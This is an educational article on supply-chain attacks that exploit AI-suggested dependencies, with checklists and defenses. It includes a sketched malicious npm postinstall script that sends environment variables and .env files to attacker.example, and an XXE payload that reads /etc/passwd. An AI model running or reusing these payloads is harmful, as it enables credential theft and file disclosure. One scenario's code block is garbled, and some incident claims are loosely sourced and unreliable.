AI coding assistants are remarkably good at solving dependency problems. Need to parse JSON? They suggest a library. Need to handle dates? They recommend a package. Building a REST API? They scaffold an entire framework setup.
But here's the problem: AI assistants don't verify that the packages they recommend are safe, maintained, or even real.
They're trained on vast amounts of code from the internet, including outdated tutorials, abandoned projects, and even malicious repositories. When an AI suggests a dependency, it's making a statistical prediction based on patterns it's seen, not conducting a security audit.
This creates a new attack surface: supply chain poisoning through AI-suggested dependencies.
Modern software development is built on dependencies. A typical web application doesn't have hundreds of dependencies — it has thousands. Every npm install, pip install, or cargo add pulls code written by strangers into your application, often with full access to your system.
The scale is staggering:
- npm hosts well over two million packages; PyPI hosts hundreds of thousands more [1]
- A single npm install express typically brings in dozens of packages
- A typical production application easily crosses a thousand transitive dependencies

Recent attacks demonstrate the danger:
- event-stream (2018): a maintainer handoff put wallet-stealing code into an npm package with millions of weekly downloads [3]
- UA-Parser-JS (2021): a hijacked maintainer account shipped cryptominers and credential stealers [4]
- PyTorch (2022): a malicious torchtriton dependency compromised nightly builds over the holidays [5]
- Ledger (2023): a compromised dApp connector kit stole roughly $600K from crypto wallets [6]
Now imagine an AI assistant that doesn't check whether packages are legitimate, actively maintained, or compromised. That's the environment we're operating in today.
AI coding assistants don't have real-time package registry access. They can't check:
- Whether a package actually exists under the suggested name
- Download counts, maintenance status, or publish history
- Recently disclosed CVEs
- Whether a maintainer account was compromised last week
Instead, they predict likely dependencies based on training data. This leads to several dangerous patterns:
1. Hallucinated Packages (That Don't Exist... Yet)
One of the most insidious risks is package hallucination — when an AI suggests a dependency that doesn't exist.
Example conversation:
Developer: "I need to validate credit card numbers in Python"
AI: "You can use the
credit-card-validatorpackage. Install it with:pip install credit-card-validator"
The problem? This package might not exist. But an attacker can create it.
This creates a supply chain attack vector:
1. The AI hallucinates a plausible-sounding package name
2. An attacker probes popular prompts, notices the recurring name, and registers it on PyPI or npm with malicious code
3. The next developer who follows the AI's suggestion installs the attacker's package

This attack is already happening. Researchers have demonstrated that hallucinated package names recur consistently across prompts and models, making them predictable targets [7].
Real incident: In 2024, security researchers found that GitHub Copilot and ChatGPT frequently suggested the package colourama (a typosquatting variant of the legitimate colorama) for Python projects. Attackers registered this package on PyPI with credential-stealing code. Thousands of developers installed it [8].
2. Outdated and Deprecated Packages
AI models are trained on historical code, which means they often suggest packages that were popular but are now:
- Deprecated or in maintenance mode
- Unmaintained, with vulnerabilities accumulating unpatched
- Superseded by better alternatives
Example — JavaScript date handling:
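A sketch of the kind of snippet an assistant typically produces, with the modern alternatives shown for contrast:

```javascript
// What the AI typically suggests: Moment.js, in maintenance mode since 2020
const moment = require('moment');
const viaMoment = moment().format('YYYY-MM-DD');

// Modern alternatives it often fails to mention:
const { format } = require('date-fns');
const viaDateFns = format(new Date(), 'yyyy-MM-dd');

// Or zero dependencies at all, via the built-in Intl API
const viaIntl = new Intl.DateTimeFormat('en-CA').format(new Date()); // "2024-05-01"
```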
The problems:
- moment.js is in maintenance mode: no new features, bug fixes only [9]
- Modern alternatives like date-fns or the native Intl.DateTimeFormat are better

But the AI doesn't know this. Its training data includes millions of lines of code using Moment.js, so it keeps recommending it.
More concerning example — cryptography:
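A minimal sketch of the pattern, assuming the classic pycrypto-era API:

```python
# The import an assistant trained on pre-2014 code is likely to suggest.
# With pycrypto installed, this pulls in a library abandoned since 2013.
from Crypto.Cipher import AES

key = b"sixteen byte key"            # 16-byte AES key
iv = b"sixteen byte iv!"             # 16-byte initialization vector
cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(b"16-byte-aligned!")  # CBC needs block-aligned input

# The maintained replacement, pycryptodome, keeps the same Crypto
# namespace: pip uninstall pycrypto && pip install pycryptodome
```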
The pycrypto library has been abandoned since 2013 and has known security vulnerabilities [10]. The modern replacement is pycryptodome, but AI tools trained on older code might not know that.
3. Vulnerable Packages with Known CVEs
AI assistants don't consult vulnerability databases. They might suggest a package that technically solves your problem but has critical security flaws.
Example:
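A hedged sketch of a typical suggestion; the point is the version assumption, not the exact code:

```javascript
// Typical AI-suggested JWT verification
const jwt = require('jsonwebtoken');

function authenticate(token, secret) {
  // Pre-9.0.0 releases were affected by several critical advisories,
  // including CVE-2022-23529 [11]; an AI trained on 2020-era code may
  // assume or pin a vulnerable version.
  return jwt.verify(token, secret, { algorithms: ['HS256'] }); // pin algorithms explicitly
}
```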
The jsonwebtoken library has had multiple critical vulnerabilities over the years. An AI trained on code from 2020 might suggest a version with known exploits [11].
Another example — XML parsing:
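A sketch of the common suggestion next to the hardened drop-in:

```python
# Commonly suggested: the standard library parser, fed untrusted input
import xml.etree.ElementTree as ET
tree = ET.parse("user_upload.xml")

# Hardened drop-in: defusedxml blocks entity-expansion attacks
# while keeping the same API (pip install defusedxml)
import defusedxml.ElementTree as DET
safe_tree = DET.parse("user_upload.xml")
```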
The standard library XML parser in Python is vulnerable to several attacks [12]. Security-conscious developers use defusedxml, but AI might not suggest it.
4. Malicious Typosquatting Packages
Attackers register packages with names similar to popular libraries, hoping developers will mistype the name. AI assistants can amplify this attack by:
- Suggesting near-miss names from memory without verifying the exact spelling (colour vs color)
- Repeating the same wrong name to thousands of developers, giving attackers a predictable target

Real examples of typosquatting packages found in the wild:
| Legitimate Package | Typosquat | Platform | Result |
|---|---|---|---|
| requests | request | PyPI | Credential stealer |
| urllib3 | urllib | PyPI | Backdoor |
| numpy | numpay | PyPI | Cryptominer |
| tensorflow | tensowflow | PyPI | Data exfiltration |
| opencv-python | opencv | PyPI | Malware installer |
In 2023, a study found over 45,000 potentially malicious packages across npm, PyPI, and RubyGems using typosquatting, combosquatting, and brandjacking techniques [2].
How AI makes this worse:
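A reconstruction of the kind of exchange that amplifies a typosquat (the dialogue is illustrative):

```python
# Developer: "How do I fetch a URL in Python?"
# AI: "Use the request library: pip install request"
import request  # typosquat; the legitimate package is `requests`

resp = request.get("https://api.example.com/users")
print(resp.json())
```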
The developer runs pip install request, which installs a malicious package instead of the legitimate requests library.
5. Dependency Confusion Attacks
This is a sophisticated supply chain attack where attackers exploit how package managers resolve dependencies:
How it works:
1. A company uses internal, unpublished packages (e.g., @acme/auth-utils)
2. An attacker publishes a package with the same name to the public registry, at a higher version number
3. A misconfigured package manager prefers the higher public version and installs the attacker's code

AI assistants can accidentally leak internal package names:
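For example, a developer might paste context like this into a chat session (the @acme names are illustrative):

```javascript
// Pasted into an AI chat while debugging:
const { verifySession } = require('@acme/internal-auth');
const { logAudit } = require('@acme/auth-utils');

// "Why does verifySession throw on refreshed tokens?"
```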
Now the AI knows your internal package naming convention. If that context is used to train future models, or if an attacker sees it in a public repository, they can:

- Register @acme/internal-auth on the public npm registry
- Publish it at a higher version number with malicious code
- Wait for a misconfigured build to resolve the public package instead of the internal one

Real incident: In 2021, security researcher Alex Birsan demonstrated dependency confusion by publishing packages matching internal package names used by Apple, Microsoft, PayPal, and others. The packages were downloaded over 35,000 times before being removed [13].
6. Transitive Dependencies (The Hidden Threat)
When you install a package, you also install all of its dependencies, and all of their dependencies, recursively. This creates a massive, often invisible attack surface.
The risk: Even if express itself is trustworthy, any of the packages it pulls in could be compromised. The event-stream attack happened through a transitive dependency; most developers didn't even know they were using it [3].
AI assistants don't understand transitive dependencies. When they suggest installing a package, they're not accounting for the hundreds of transitive dependencies it might pull in.
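You can make that hidden surface visible yourself. A couple of standard npm commands, sketched below, enumerate the full tree (minimist is just an illustrative package name):

```bash
# Count every package the install actually pulled in
npm ls --all | wc -l

# Find out which top-level dependency drags in a given package
npm ls minimist --all
```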
Let's walk through how these risks materialize in practice:
Scenario 1: The Hallucinated Package

Setup:
- A developer asks an AI for Express JWT authentication middleware
- The AI suggests express-jwt-auth (a hallucinated package)

Attack:
1. An attacker notices assistants repeatedly suggesting express-jwt-auth and registers it on npm
2. The published package implements working authentication, plus a hidden payload, as sketched below
express-jwt-authjavascript
3. The developer runs npm install express-jwt-auth and integrates it

Detection: This could go undetected for months because the authentication still works correctly. The malicious behavior is subtle and hidden.
Scenario 2: The Unsafe XML Parser

Setup:
- A developer asks an AI how to parse user-supplied XML with lxml in Python

What AI suggests:
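A reconstruction of the kind of snippet an assistant produces, using lxml's default parser (the function name is illustrative):

```python
from lxml import etree

def parse_user_xml(xml_bytes):
    # lxml's default parser resolves entities, including external ones
    root = etree.fromstring(xml_bytes)
    return root.findtext("name")
```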
The vulnerability:
This code is vulnerable to XML External Entity (XXE) attacks, which can lead to:
- Local file disclosure: reading /etc/passwd or application secrets
- Server-side request forgery (SSRF) against internal services
- Denial of service through entity expansion

Exploit example:
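A classic XXE payload (the element names match the sketch above):

```xml
<?xml version="1.0"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
</user>
```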
When parsed with the AI-suggested code, this XML reads and returns the contents of /etc/passwd.
Safe version (which AI should have suggested):
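A hardened sketch that disables DTDs and entity resolution explicitly:

```python
from lxml import etree

def parse_user_xml(xml_bytes):
    parser = etree.XMLParser(
        resolve_entities=False,  # never expand entities
        no_network=True,         # never fetch remote resources
        load_dtd=False,          # ignore DTDs entirely
    )
    root = etree.fromstring(xml_bytes, parser=parser)
    return root.findtext("name")
```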
Scenario 3: The Hijacked Abandoned Package

Setup:
- A project depends on chartjs-helper (a popular but abandoned npm package)

Attack:
1. An attacker takes over the abandoned package (a compromised account or an ownership transfer)
2. They publish a new version with a malicious postinstall script (declared in its package.json)
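A hypothetical sketch of such a script; real attacks used similar but heavily obfuscated payloads:

```javascript
// postinstall.js - runs automatically on `npm install`
const fs = require('fs');
const https = require('https');

// Harvest whatever secrets are lying around on the machine
const loot = {
  env: process.env, // CI tokens, cloud credentials
  dotenv: fs.existsSync('.env') ? fs.readFileSync('.env', 'utf8') : null,
};

const req = https.request({
  hostname: 'attacker.example',
  method: 'POST',
  path: '/collect',
});
req.on('error', () => {}); // fail silently
req.end(JSON.stringify(loot));
```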
3. Every project that runs npm install chartjs-helper pulls the new version
4. The postinstall script runs automatically, exfiltrating secrets

Impact:
- CI/CD tokens and cloud credentials stolen from build servers
- .env files from developer machines exfiltrated

This is exactly what happened with the event-stream and UA-Parser-JS attacks [3][4].
Before installing any AI-suggested package, complete these checks:
| Step | Verification | Command/Tool | ✅ Safe | ❌ Reject |
|---|---|---|---|---|
| 1 | Package exists | npm info package-name | Shows valid metadata | Not found |
| 2 | Download volume | Check weekly downloads | >1,000/week | <1,000/week ⚠️ |
| 3 | Known vulnerabilities | npm audit or Snyk | No high/critical CVEs | High/Critical CVEs found |
| 4 | Active maintenance | Last publish date | Updated within 1 year | >1 year old ⚠️ |
| 5 | Dependency count | npm list --all | <50 total packages | >50 packages ⚠️ |
| 6 | Install scripts | Check package.json | None or benign | Suspicious scripts |
Decision Rules:
- All six checks pass: install
- Any ⚠️ result: investigate further before deciding
- Any ❌ result: reject and find an alternative
This 6-step checklist takes 2-3 minutes per package but prevents supply chain compromises.
Check package info:
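For npm, a few read-only commands surface most of the checklist data (the package name is a placeholder):

```bash
npm info some-package              # does it exist? who publishes it?
npm view some-package time         # full publish history: is it brand new?
npm view some-package maintainers  # how many accounts control it?
```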
Scan for vulnerabilities:
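A sketch of the standard scanners per ecosystem:

```bash
npm audit                       # JavaScript: built into npm
npm audit --audit-level=high    # exit non-zero only for high/critical findings
pip-audit                       # Python: pip install pip-audit
```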
Also check:
- The linked source repository: stars, open issues, recent commits
- Snyk Advisor or deps.dev health scores
- Whether the published package actually matches the repository contents
Advanced verification tools:
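Two widely used third-party scanners, sketched here (check their docs for current flags):

```bash
# Google's OSV scanner checks lockfiles against the OSV database
osv-scanner --lockfile=package-lock.json

# Snyk's CLI tests the current project against its vulnerability DB
npx snyk test
```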
Examine before installing:
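npm pack downloads the tarball without running any scripts, so you can read the code first (package name is a placeholder):

```bash
npm pack some-package            # downloads some-package-1.2.3.tgz, runs nothing
tar -tzf some-package-*.tgz      # list the contents
tar -xzf some-package-*.tgz
less package/package.json        # check the scripts section before installing
```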
Pay particular attention to lifecycle scripts in its package.json:
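A hypothetical example of the kind of entry that should stop an install cold:

```json
{
  "name": "chartjs-helper",
  "version": "2.1.0",
  "scripts": {
    "postinstall": "node postinstall.js"
  }
}
```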
Note: Legitimate packages rarely need install scripts. If present, read them carefully.
Here's how to protect your organization from AI-amplified supply chain risks:
1. Require Human Review for All New Dependencies
Policy:
- No new dependency merges without a human running the verification checklist
- AI-suggested packages get the same scrutiny as any other new dependency, with no exception because "the assistant recommended it"
Implementation:
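One way to enforce this is GitHub's dependency-review-action, sketched here:

```yaml
# .github/workflows/dependency-review.yml
name: Dependency Review
on: [pull_request]
jobs:
  dependency-review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # Flags newly introduced dependencies and fails on severe advisories
      - uses: actions/dependency-review-action@v4
        with:
          fail-on-severity: high
```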
2. Use Private Package Registries with Allowlists
Option 1: npm Enterprise / GitHub Packages
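Pointing npm at an internal registry means only vetted packages resolve (the URLs are placeholders):

```bash
# Route all installs through the internal registry
npm config set registry https://npm.internal.example.com/

# Or scope it: only @acme packages come from the private registry
npm config set @acme:registry https://npm.pkg.github.com/
```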
Option 2: Artifactory / Nexus with Proxying
Option 3: Renovate/Dependabot with Approval Workflows
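A minimal Renovate configuration that routes every update through a manual approval dashboard:

```json
{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "dependencyDashboard": true,
  "dependencyDashboardApproval": true
}
```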
3. Implement Subresource Integrity (SRI) for CDN Assets
If AI suggests loading libraries from CDNs, always use SRI hashes.
Without SRI (vulnerable):
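Without SRI, the page trusts whatever the CDN serves (URL illustrative):

```html
<script src="https://cdn.example.com/lodash.min.js"></script>
```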
With SRI (protected):
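With SRI, the browser verifies the file's hash before executing it; the hash below is a placeholder:

```html
<!-- Generate the real hash with:
     openssl dgst -sha384 -binary lodash.min.js | openssl base64 -A -->
<script
  src="https://cdn.example.com/lodash.min.js"
  integrity="sha384-REPLACE_WITH_REAL_HASH"
  crossorigin="anonymous"></script>
```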
If the CDN is compromised and delivers different code, the browser refuses to execute it.
4. Enable Dependency Pinning and Lock Files
Always commit lock files:
- package-lock.json (npm)
- yarn.lock (Yarn)
- Pipfile.lock (Python/Pipenv)
- Gemfile.lock (Ruby)
- Cargo.lock (Rust)
- go.sum (Go)

Use exact versions in production:
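Exact pins carry no ^ or ~ range operators (versions illustrative):

```json
{
  "dependencies": {
    "express": "4.18.2",
    "jsonwebtoken": "9.0.2"
  }
}
```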
5. Scan Dependencies in CI/CD Pipeline
GitHub Actions example:
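A minimal audit job, as a sketch:

```yaml
name: Dependency Scan
on: [push, pull_request]
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - run: npm ci
      # Fail the build when high/critical advisories are present
      - run: npm audit --audit-level=high
```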
6. Monitor for Dependency Hijacking
Use services that alert you when:
- A package you depend on changes maintainers or ownership
- A new version adds install scripts or unexpected network behavior
- A dependency is deprecated, unpublished, or flagged as malicious
7. Implement Software Bill of Materials (SBOM)
Generate an SBOM for every release:
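Two common SBOM generators, sketched here (flags current as of writing):

```bash
# CycloneDX SBOM for an npm project
npx @cyclonedx/cyclonedx-npm --output-file sbom.json

# Syft works across ecosystems and container images
syft dir:. -o cyclonedx-json > sbom.json
```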
Store SBOMs alongside releases so you can:
- Answer "are we affected?" within minutes when a new CVE drops
- Trace a compromised package to every release that shipped it
- Give auditors and customers an exact inventory of what you ship
Before accepting AI-suggested dependencies, verify the package exists on an official registry under the exact name you intend to use, is actively maintained, and links to a legitimate source repository. Scan for recent high‑severity CVEs, confirm the license is compatible, and prefer packages without install scripts or sprawling transitive trees.
Reject immediately when you see classic red flags: brandjacked or near‑miss names, brand‑new packages presented as “standard,” negligible downloads, empty or mismatched repositories, install steps that execute network scripts, or obfuscated source code.
When in doubt, pause for deeper review if maintenance looks stale, a single maintainer represents a clear bus factor, security issues are piling up, binaries ship in the repo, or the package requests unusual permissions or behaviors during installation.
Before moving to the next chapter, make sure you understand:
- Why AI assistants suggest hallucinated, outdated, or typosquatted packages
- How dependency confusion and transitive dependencies widen the attack surface
- What to verify before running any AI-suggested npm install or pip install
- How lock files, private registries, CI scanning, and SBOMs limit the blast radius

References

[1] PyPI Stats – Python Package Index Statistics
[2] Socket Security Research – Supply Chain Attack Detection & Monitoring
[3] Snyk (2018) – Malicious code found in npm package event-stream
[4] TrueSec (2021) – UAParser.js npm Package Supply Chain Attack: Impact and Response
[5] BleepingComputer (2022) – PyTorch discloses malicious dependency chain compromise over holidays
[6] BleepingComputer (2023) – Ledger dApp supply chain attack steals $600K from crypto wallets
[7] Lasso Security (2023) – AI Hallucinations Package Risk
[8] Imperva (2024) – Python's Colorama Typosquatting Meets 'Fade Stealer' Malware
[9] Moment.js – Project Status: Maintenance Mode
[10] NVD – CVE-2013-7459: PyCrypto Hash Collision Vulnerability
[11] GitHub Advisory – CVE-2022-23529: jsonwebtoken vulnerable to signature validation bypass
[12] OWASP – XML External Entity (XXE) Processing
[13] Medium, Alex Birsan (2021) – Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Others